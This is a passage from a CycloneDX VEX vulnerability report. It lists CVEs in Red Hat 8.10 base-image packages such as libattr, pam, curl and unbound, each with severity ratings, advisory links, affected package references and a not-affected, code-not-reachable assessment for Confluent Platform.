          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-54371",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N"
        }
      ],
      "cwes": [
        59
      ],
      "description": "attr before version 2.6.0 contains a symlink traversal vulnerability in the getfattr and setfattr utilities that allows local attackers to escalate privileges by replacing a pathname component with a symbolic link during directory hierarchy traversal. Attackers who control a pathname component can redirect getfattr and setfattr operations to arbitrary files by substituting a symlink, leading to local privilege escalation when getfattr or setfattr is invoked by a privileged process over an attacker-controlled path.",
      "recommendation": "Upgrade libattr to version 2.6.0-1.el8_10",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-54371"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34889"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:56133"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-54371"
        },
        {
          "url": "https://bugzilla.redhat.com/2490283"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2490283"
        },
        {
          "url": "https://cgit.git.savannah.nongnu.org/cgit/attr.git/commit/?id=49f79e947270f06940b9100fa638f85dddc4aa7f"
        },
        {
          "url": "https://cgit.git.savannah.nongnu.org/cgit/attr.git/commit/?id=c440855d6b33446edf4b5eb1a2d892281f15a99b"
        },
        {
          "url": "https://errata.almalinux.org/8/ALSA-2026-56133.html"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-54371.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-56133.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-54371"
        },
        {
          "url": "https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-54371.json"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-54371"
        },
        {
          "url": "https://www.vulncheck.com/advisories/attr-symlink-traversal-privilege-escalation-via-getfattr-setfattr"
        }
      ],
      "published": "2026-06-29T14:16:57+00:00",
      "updated": "2026-08-19T12:18:32+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libattr@2.4.48-3.el8?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.4.48-3.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libattr@2.4.48-3.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libattr@2.4.48-3.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libattr@2.4.48-3.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libattr@2.4.48-3.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libattr@2.4.48-3.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libattr@2.4.48-3.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libattr@2.4.48-3.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libattr@2.4.48-3.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libattr@2.4.48-3.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libattr@2.4.48-3.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libattr@2.4.48-3.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libattr@2.4.48-3.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libattr@2.4.48-3.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libattr@2.4.48-3.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libattr@2.4.48-3.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libattr@2.4.48-3.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libattr@2.4.48-3.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libattr@2.4.48-3.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libattr@2.4.48-3.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libattr@2.4.48-3.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libattr@2.4.48-3.el8?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-54411",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.8,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:A/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        208
      ],
      "description": "Linux-PAM through 1.7.2 contains an observable timing discrepancy (CWE-208) in the pam_userdb module's plaintext-password comparison path in modules/pam_userdb/pam_userdb.c that allows a local or network-adjacent attacker able to repeatedly drive authentication through a calling service to recover the plaintext password of a target account by measuring response-timing differences.",
      "recommendation": "Upgrade pam to version 1.3.1-40.el8_10",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-54411"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:56131"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-54411"
        },
        {
          "url": "https://bugzilla.redhat.com/2488766"
        },
        {
          "url": "https://cwe.mitre.org/data/definitions/208.html"
        },
        {
          "url": "https://errata.almalinux.org/8/ALSA-2026-56131.html"
        },
        {
          "url": "https://github.com/linux-pam/linux-pam"
        },
        {
          "url": "https://github.com/linux-pam/linux-pam/blob/master/libpam/include/pam_inline.h"
        },
        {
          "url": "https://github.com/linux-pam/linux-pam/blob/master/modules/pam_userdb/pam_userdb.c#L327"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-54411.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-56131.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-54411"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8601-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-54411"
        }
      ],
      "published": "2026-06-14T18:17:20+00:00",
      "updated": "2026-08-10T12:17:17+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/pam@1.3.1-39.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.3.1-39.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/pam@1.3.1-39.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/pam@1.3.1-39.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/pam@1.3.1-39.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/pam@1.3.1-39.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/pam@1.3.1-39.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/pam@1.3.1-39.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/pam@1.3.1-39.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/pam@1.3.1-39.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/pam@1.3.1-39.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/pam@1.3.1-39.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/pam@1.3.1-39.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/pam@1.3.1-39.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/pam@1.3.1-39.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/pam@1.3.1-39.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/pam@1.3.1-39.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/pam@1.3.1-39.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/pam@1.3.1-39.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/pam@1.3.1-39.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/pam@1.3.1-39.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/pam@1.3.1-39.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/pam@1.3.1-39.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-5545",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        613
      ],
      "description": "libcurl might in some circumstances reuse the wrong connection when asked to\ndo an authenticated HTTP(S) request after a Negotiate-authenticated one, when\nboth use the same host.\n\nlibcurl features a pool of recent connections so that subsequent requests can\nreuse an existing connection to avoid overhead.\n\nWhen reusing a connection a range of criteria must be met. Due to a logical\nerror in the code, a request that was issued by an application could\nwrongfully reuse an existing connection to the same server that was\nauthenticated using different credentials.\n\nAn application that first uses Negotiate authentication to a server with\n`user1:password1` and then does another operation to the same server asking\nfor any authentication method but for `user2:password2` (while the previous\nconnection is still alive) - the second request gets confused and wrongly\nreuses the same connection and sends the new request over that connection\nthinking it uses a mix of user1's and user2's credentials when it is in fact\nstill using the connection authenticated for user1...",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-5545"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-5545"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-5545.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-5545.json"
        },
        {
          "url": "https://github.com/advisories/GHSA-6g7g-56fm-f8mp"
        },
        {
          "url": "https://hackerone.com/reports/3642555"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-5545"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8227-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8525-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-5545"
        }
      ],
      "published": "2026-05-13T13:01:56+00:00",
      "updated": "2026-06-17T10:59:12+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-55990",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        457
      ],
      "description": "In NLnet Labs Unbound 1.7.0 up to and including 1.25.1, when the 'dnscrypt:' clause lists more 'dnscrypt-provider-cert:' files than there are matching 'dnscrypt-secret-key:' files, Unbound fills only the matched prefix and leaves the tail slots at the '0xdb' fill that libsodium's allocator writes into every allocation. Unbound would then iterate over the number of cert files, not the actual slots, so it walks into a slot with garbage data filled with '0xdb' bytes. Any unauthenticated client that sends one UDP datagram of \u2265 68 bytes whose first 8 bytes are '0xdb' to 'dnscrypt-port' will use that garbage entry which leads to a garbage dereference killing the server. This is a silent faulty configuration that goes unnoticed until triggered with the right client query. Unbound needs to be compiled with DNSCrypt support ('--enable-dnscrypt').",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-55990"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-55990"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-55990"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-55990"
        },
        {
          "url": "https://www.nlnetlabs.nl/downloads/unbound/CVE-2026-55990.txt"
        }
      ],
      "published": "2026-07-22T14:17:21+00:00",
      "updated": "2026-07-24T14:24:26+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.16.2-5.12.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.16.2-5.12.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
